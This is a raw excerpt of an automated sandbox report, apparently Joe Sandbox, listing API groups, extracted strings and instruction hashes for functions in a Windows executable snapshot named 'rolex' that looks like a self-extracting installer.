                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: CMT
                                                                                • API String ID: 0-2756464174
                                                                                • Opcode ID: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                                                                                • Instruction ID: 98af63e084f5c6a2338b1af572d9dcb5cc9b7f22780347c4010f1f279246f76a
                                                                                • Opcode Fuzzy Hash: b8fa635b894758bb4949fb57bddd48836ff0d2ecd2be86fe1bb2065c738ed5aa
                                                                                • Instruction Fuzzy Hash: 3E42D222B0A68196FB18EB78C1506FDB7A1FB51744F810136EB6E576B6DF38E518C310

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                • API String ID: 1496594111-2013832382
                                                                                • Opcode ID: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                • Instruction ID: 7879610c5b2aff341a198f7b2b27bf57cf70b2fb6a3524d8ca8b45d08013bc5e
                                                                                • Opcode Fuzzy Hash: 652c747d7e630e86415ee3ad066f254a367a94a472fe2acd263d178260856de2
                                                                                • Instruction Fuzzy Hash: 5E321A31A0BB8299EB51AF68E8401E9B3A4FF44354FD10236DA8D467B9EF3CD655C360
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A8E58: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AB4A8F8D
                                                                                • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF7AB4A9F75
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4AA42F
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4AA435
                                                                                  • Part of subcall function 00007FF7AB4B0BBC: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF7AB4B0B44), ref: 00007FF7AB4B0BE9
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                • API String ID: 3629253777-3268106645
                                                                                • Opcode ID: 789f2c465d95f0b5fb7cec132a24dad3ff94c3f7f58e61963b873022c14ab567
                                                                                • Instruction ID: 8c14d0a5cb31f46ba8035a4d337bf08ac810c9b08719cbf057067571c89b4797
                                                                                • Opcode Fuzzy Hash: 789f2c465d95f0b5fb7cec132a24dad3ff94c3f7f58e61963b873022c14ab567
                                                                                • Instruction Fuzzy Hash: A362AE22A1AB8295EB10EF2CD4442BEA365FB44788FC2413ADA5D476F5EF3CE544C360

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                                • String ID: H
                                                                                • API String ID: 3432403771-2852464175
                                                                                • Opcode ID: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction ID: 4307360f4bfbc7aec75a2fc4b8ad21933edaf06b52d15c34199e32f7685a6082
                                                                                • Opcode Fuzzy Hash: cf3fc932a6b7fb7fc9ef8320b4dd67bfc8d7ec91281715f792326570f1d4a57f
                                                                                • Instruction Fuzzy Hash: 48913C32A06B518AEB50EF69D8406BCB3B1BB09B98F864535DE0D17774EF38E845D720

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_invalid_parameter_noinfo_noreturn
                                                                                • String ID: .exe$.inf$Install$p
                                                                                • API String ID: 148627002-3607691742
                                                                                • Opcode ID: 1718da423bd7346896bcb56f91dbb63b3cffccde2402356a375081e8d016c4d6
                                                                                • Instruction ID: 04b4d9a7277dbf4b78d032f230b9390d30ae976814bb5301a808132fb0d91296
                                                                                • Opcode Fuzzy Hash: 1718da423bd7346896bcb56f91dbb63b3cffccde2402356a375081e8d016c4d6
                                                                                • Instruction Fuzzy Hash: FEC18E62F1AA0295FB00EBADD94027DA7B1AF85B80F854435DF4D87AB6DF3DE4518320

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                • String ID: PNG
                                                                                • API String ID: 541704414-364855578
                                                                                • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction ID: 82dc82f6de6f9bc7a10d5253274535b70feae0236ba9e7b6117727e70b5d427d
                                                                                • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
                                                                                • Instruction Fuzzy Hash: 93414F25A0BB0681EF44AF6AD854379EBA0AF88F94F890435CE4D47374EF7CE4498320

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ButtonChecked$Message$DialogDispatchItemPeekShowTranslateWindow
                                                                                • String ID:
                                                                                • API String ID: 4119318379-0
                                                                                • Opcode ID: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                • Instruction ID: b513e985a5749d1e67c3a718856697fa50014c49179cf7080e1c6e3cdfd5c1fc
                                                                                • Opcode Fuzzy Hash: 6d17268858d6b6aed380ad60cc2cf8b16547cb3a0c40a3112c59011326a33119
                                                                                • Instruction Fuzzy Hash: 0441C332B1664286F700AF79E814BA96760EB45F98FC50135DE0E07BB5CF3EE4458764

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                • API String ID: 1389829785-2207617598
                                                                                • Opcode ID: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                • Instruction ID: 24f08c071dfafab042a5e69a4cf511d783f90666f51b38a964239d339b6a49a0
                                                                                • Opcode Fuzzy Hash: d2e93635ec338890dfe438c4789fcaf7e26687fbfe6c7ce53d5981307f2d6baa
                                                                                • Instruction Fuzzy Hash: 24316B21A0BB0380FA55AB2EA850179A7A0AF45F94FC74139D94E433B5EE3EF541C320
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0

                                                                                Similarity
                                                                                • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3536497005-0

                                                                                Similarity
                                                                                • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                • String ID: ]
                                                                                • API String ID: 2347093688-3352871620

                                                                                Similarity
                                                                                • API ID: Message$DispatchObjectPeekSingleTranslateWait
                                                                                • String ID:
                                                                                • API String ID: 3621893840-0

                                                                                Similarity
                                                                                • API ID: Message$DialogDispatchPeekTranslate
                                                                                • String ID:
                                                                                • API String ID: 1266772231-0

                                                                                Similarity
                                                                                • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                • String ID: EDIT
                                                                                • API String ID: 4243998846-3080729518

                                                                                Similarity
                                                                                • API ID: FileWrite$Handle
                                                                                • String ID:
                                                                                • API String ID: 4209713984-0
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                • String ID:
                                                                                • API String ID: 3750147219-0
                                                                                Similarity
                                                                                • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2359106489-0
                                                                                Similarity
                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 1452418845-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                • String ID:
                                                                                • API String ID: 2244327787-0
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4AECD8: ResetEvent.KERNEL32 ref: 00007FF7AB4AECF1
                                                                                  • Part of subcall function 00007FF7AB4AECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AED07
                                                                                • ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AE974
                                                                                • FindCloseChangeNotification.KERNELBASE ref: 00007FF7AB4AE993
                                                                                • DeleteCriticalSection.KERNEL32 ref: 00007FF7AB4AE9AA
                                                                                • CloseHandle.KERNEL32 ref: 00007FF7AB4AE9B7
                                                                                  • Part of subcall function 00007FF7AB4AEA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AB4AE95F,?,?,?,00007FF7AB4A463A,?,?,?), ref: 00007FF7AB4AEA63
                                                                                  • Part of subcall function 00007FF7AB4AEA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF7AB4AE95F,?,?,?,00007FF7AB4A463A,?,?,?), ref: 00007FF7AB4AEA6E
                                                                                Similarity
                                                                                • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                • String ID:
                                                                                • API String ID: 2143293610-0
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Thread$CreatePriority
                                                                                • String ID: CreateThread failed
                                                                                • API String ID: 2610526550-3849766595
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: DirectoryInitializeMallocSystem
                                                                                • String ID: riched20.dll
                                                                                • API String ID: 174490985-3360196438
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4B853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF7AB4B856C
                                                                                  • Part of subcall function 00007FF7AB4AAAE0: LoadStringW.USER32 ref: 00007FF7AB4AAB67
                                                                                  • Part of subcall function 00007FF7AB4AAAE0: LoadStringW.USER32 ref: 00007FF7AB4AAB80
                                                                                  • Part of subcall function 00007FF7AB491FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB491FFB
                                                                                  • Part of subcall function 00007FF7AB49129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7AB491396
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4C01BB
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4C01C1
                                                                                • SendDlgItemMessageW.USER32 ref: 00007FF7AB4C01F2
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                • String ID:
                                                                                • API String ID: 3106221260-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$FileOperation
                                                                                • String ID:
                                                                                • API String ID: 2032784890-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2272807158-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 2176759853-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1875163511-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: DeleteFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3118131910-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1203560049-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Process$CurrentExitTerminate
                                                                                • String ID:
                                                                                • API String ID: 1703294689-0
                                                                                APIs
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49F895
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49F89B
                                                                                  • Part of subcall function 00007FF7AB4A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseFind
                                                                                • String ID:
                                                                                • API String ID: 3587649625-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                APIs
                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF7AB4A274D), ref: 00007FF7AB4A28A9
                                                                                • GetLastError.KERNEL32(?,00007FF7AB4A274D), ref: 00007FF7AB4A28B8
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1746051919-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: File$BuffersFlushTime
                                                                                • String ID:
                                                                                • API String ID: 1392018926-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorFileLastPointer
                                                                                • String ID:
                                                                                • API String ID: 2976181284-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: Item$RectText$ClientWindowswprintf
                                                                                • String ID:
                                                                                • API String ID: 402765569-0
                                                                                • Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction ID: bb2dc2541cae2303fcb44893a636d273d66093d033e2b16a910fe2d07ca9fe6f
                                                                                • Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
                                                                                • Instruction Fuzzy Hash: 95011221A0F38A41FE55776AA454679D7519F85B54F8A4035E84D062B9EE2CF884C320
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7AB4AEBAD,?,?,?,?,00007FF7AB4A5752,?,?,?,00007FF7AB4A56DE), ref: 00007FF7AB4AEB5C
                                                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF7AB4AEB6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Process$AffinityCurrentMask
                                                                                • String ID:
                                                                                • API String ID: 1231390398-0
                                                                                • Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction ID: 0817adcb32f65533a62112da8601f2363bfb4191d1c529f14afd29576dd038e8
                                                                                • Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
                                                                                • Instruction Fuzzy Hash: 54E02B61F1654642DF49EF5DC4445F9B392BFC8B40FC58035D60B83634DE2CE1498B00
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 1173176844-0
                                                                                • Opcode ID: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                • Instruction ID: ddfdfd7ec0acdf5f2bccbdefdea384879df63144bec84b97b47061338c9d4d89
                                                                                • Opcode Fuzzy Hash: ac554a43d54612151bc7e480101717375080be3004ee5b366f50feb51e7139dd
                                                                                • Instruction Fuzzy Hash: 98E01240E0F20B41FD59367E18251B481904F1BF70EDF2730DE3E046F6AD6CA5919130
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                • String ID:
                                                                                • API String ID: 588628887-0
                                                                                • Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                • Instruction ID: c3b773510616ae4bd7cefc2f4864232ba70644693c0772add03ecee7fb40b467
                                                                                • Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
                                                                                • Instruction Fuzzy Hash: 50E08C60F0BA0382FF48BFFA98051B8E3E05F95F54BC60434C90D86272EE2CA4B18620
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                                                                                • Instruction ID: 80c131fae62b9bbc2c30260db6abb84e7fddc9b0d11c5df2fb78cf499cdc00de
                                                                                • Opcode Fuzzy Hash: db0f75601c8d953953658c1d14be6529ec917dbd1ad2d5887d518296e9f1c024
                                                                                • Instruction Fuzzy Hash: F6D1A562B0A68156EF68EB3D95446B9F7E1FB06B84F864035DB5D477B1CF38E8608320
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: e2460866a0684328410107459c6d972396d79668fc4668c3375d4f16519848c4
                                                                                • Instruction ID: 790406e4bb7baaedcb223bf09e447acbee1dd26c4a6f6d0c525cc48f4a19a193
                                                                                • Opcode Fuzzy Hash: e2460866a0684328410107459c6d972396d79668fc4668c3375d4f16519848c4
                                                                                • Instruction Fuzzy Hash: E4916322F1965288FB00EBB8D8841EC6B75AF01768FD50635DA2D56AFADF78D485C320
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4AE948: ReleaseSemaphore.KERNEL32 ref: 00007FF7AB4AE974
                                                                                  • Part of subcall function 00007FF7AB4AE948: FindCloseChangeNotification.KERNELBASE ref: 00007FF7AB4AE993
                                                                                  • Part of subcall function 00007FF7AB4AE948: DeleteCriticalSection.KERNEL32 ref: 00007FF7AB4AE9AA
                                                                                  • Part of subcall function 00007FF7AB4AE948: CloseHandle.KERNEL32 ref: 00007FF7AB4AE9B7
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4B1ACB
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ChangeCriticalDeleteFindHandleNotificationReleaseSectionSemaphore_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1624603282-0
                                                                                • Opcode ID: 84549558681af96b4525e1e1ffe2288fe9035f316ab4ad669e4cf30d3a3af5a1
                                                                                • Instruction ID: 0bab7cfb7212697f4bcfc1386ced82f284cee259d4a85492d6a3207960681aa7
                                                                                • Opcode Fuzzy Hash: 84549558681af96b4525e1e1ffe2288fe9035f316ab4ad669e4cf30d3a3af5a1
                                                                                • Instruction Fuzzy Hash: 4A61AF62B26B8592EE08EFA9D5540BCB365FF45F90B954136D72D07AF1CF28E4A18310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
